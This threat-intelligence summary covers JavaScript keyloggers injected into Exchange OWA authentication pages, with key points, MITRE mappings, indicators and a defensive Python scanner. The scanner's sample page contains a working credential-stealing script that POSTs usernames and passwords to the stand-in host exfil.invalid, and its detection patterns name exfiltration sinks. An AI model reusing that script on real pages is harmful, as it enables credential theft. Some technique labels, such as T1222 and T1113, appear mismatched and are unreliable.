PT ESC Threat Intelligence

Positive Technologies discovered JavaScript keyloggers injected into Exchange Server authentication pages that either write stolen credentials to local files on the server that are reachable from outside, or exfiltrate them directly to external servers (via HTTP requests, Telegram bots, DNS tunneling, HTTP headers, or open directories). Analysis found reused, obfuscated code variants collecting credentials, cookies, and the User-Agent string, with target URLs such as /owa/auth/logon.aspx and exfiltration methods including Telegram and DNS. #ExchangeServer #Telegram

Keypoints

  • PT Expert Security Center identified JavaScript keyloggers injected into Exchange Server authentication pages in 2024–2025.
  • Two main categories: keyloggers that save data to local server files and those that send data immediately to external servers.
  • Local-logging variant writes credentials to files on the compromised Exchange server at paths reachable from an external network; the attackers know the file locations and retrieve the data later.
  • Exfiltration methods include POST/GET requests, HTTP headers, JSON bodies, Telegram bots, DNS tunneling, and open directories.
  • Malicious code often embedded in or called from the legitimate clkLgn function and frequently obfuscated; variants also steal cookies and User-Agent.
  • Target URLs include /owa/auth/lo.aspx, /owa/auth/getidtokens.aspx, /owa/auth/error.aspx, /owa/auth/logon.aspx, and other OWA auth pages.
  • Attackers sometimes tag stolen data with organization identifiers; by storing data locally or using legitimate services instead of a traditional C2 channel, they lower the chance of detection and avoid needing a persistent connection back to their infrastructure.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – JavaScript injected into Exchange authentication pages executes in the browser to capture credentials (“malicious JavaScript code reads and processes the data from the authentication form”).
  • [T1113] Screen Capture – (implied) Collection of additional client-side data such as cookies and User-Agent to augment credential theft (“variant of malicious code collecting victim’s cookie data”).
  • [T1078] Valid Accounts – Attackers collect legitimate user credentials via the keylogger to use valid authentication data (“victim visits the Exchange Server authentication page and enters their credentials”).
  • [T1041] Exfiltration Over C2 Channel – Data sent directly to external servers, Telegram bots, or services like Discord (“A dedicated server, a Telegram bot… or other legitimate services (such as Discord) can be used”).
  • [T1071] Application Layer Protocol – Use of HTTP(S) POST/GET requests and custom headers to transmit stolen data (“data could be sent as parameters in a GET request … or in the body of a POST request” and “Using headers to send user data”).
  • [T1048] Exfiltration Over Alternative Protocol – Use of DNS tunneling to exfiltrate encrypted user data as subdomains (“prepare function encrypts user data… and adds it as a subdomain”).
  • [T1222] File and Directory Discovery (storage abuse) – Attackers write stolen data to files in open directories on compromised servers for external access (“writes the data to a file on the server… accessible from an external network” and “open directories to store text files containing stolen data”).

Indicators of Compromise

  • [URL paths] Compromised Exchange auth pages – /owa/auth/logon.aspx, /owa/auth/getidtokens.aspx (examples of target pages hosting malicious handlers).
  • [JavaScript code patterns] Obfuscated fetch/XHR exfiltration – examples include code sending a base64-encoded "Aes" parameter via POST, constructs like btoa(aes), and reads of document.getElementById("username").value / document.getElementById("password").value.
  • [Exfiltration channels] Telegram bot identifiers and API usage – messages containing identifiers used to tag stolen credentials (example: Telegram bot usage for sending data).
  • [DNS] DNS tunneling subdomain patterns – hex-encoded XOR-encrypted payloads appended as subdomains using the key "exchange_default_password" (example: DNS-based exfiltration described).
  • [Storage artifacts] Open directory text files – text files in public directories containing collected credentials (example shows stolen data stored in open directories).
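A defender-side triage check for the indicators above, added here as an example and not code from the PT ESC research: it scans the inline scripts of a saved OWA authentication page and flags any script block that both reads the credential fields and contains an exfiltration sink, which is the combination the injected variants share. The page samples, the marker lists and the exfil.invalid host name are constructed assumptions.

```python
import re

# Heuristic markers derived from the indicators listed above. A login page may
# legitimately touch some of these on its own; the signal is one <script> block
# that BOTH reads credential data and contains a network/encoding sink.
CREDENTIAL_READS = [
    r'getElementById\(\s*["\'](?:username|password)["\']\s*\)\.value',
    r'document\.cookie',
    r'navigator\.userAgent',
]
EXFIL_SINKS = [
    r'\bfetch\s*\(',
    r'XMLHttpRequest',
    r'api\.telegram\.org',
    r'\bbtoa\s*\(',
    r'new\s+Image\s*\(',
]
OBFUSCATION = [r'\beval\s*\(', r'String\.fromCharCode', r'(?:\\x[0-9a-fA-F]{2}){8,}']
SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script>', re.I | re.S)

def scan_page(html):
    """Return one finding per inline <script> block that reads credentials AND
    contains an exfiltration sink; obfuscation markers are reported as context."""
    findings = []
    for idx, m in enumerate(SCRIPT_RE.finditer(html)):
        body = m.group(1)
        reads = [p for p in CREDENTIAL_READS if re.search(p, body)]
        sinks = [p for p in EXFIL_SINKS if re.search(p, body)]
        if reads and sinks:
            findings.append({
                "script": idx,
                "reads": reads,
                "sinks": sinks,
                "obfuscated": any(re.search(p, body) for p in OBFUSCATION),
            })
    return findings

# Constructed samples (not real OWA code): a simplified stand-in for the page's
# own clkLgn handler, and the same page with a credential-stealing block injected.
CLEAN_PAGE = """<html><script>
function clkLgn(){ if(document.getElementById("rdoPrvt").checked){
  document.cookie="PBack=0"; } }
</script><form onsubmit="clkLgn()"><input id="username"><input id="password"></form></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</form>", """</form><script>
function clkLgn(){ var u=document.getElementById("username").value,
  p=document.getElementById("password").value;
  fetch("https://exfil.invalid/x",{method:"POST",body:btoa(u+":"+p)}); }
</script>""")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_page(page))
```

Run it against copies of the .aspx files in the OWA auth directory and compare against a known-good Exchange build, since a legitimate update can also change those scripts.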


Read more: https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/exchange-mutations-malicious-code-in-outlook-pages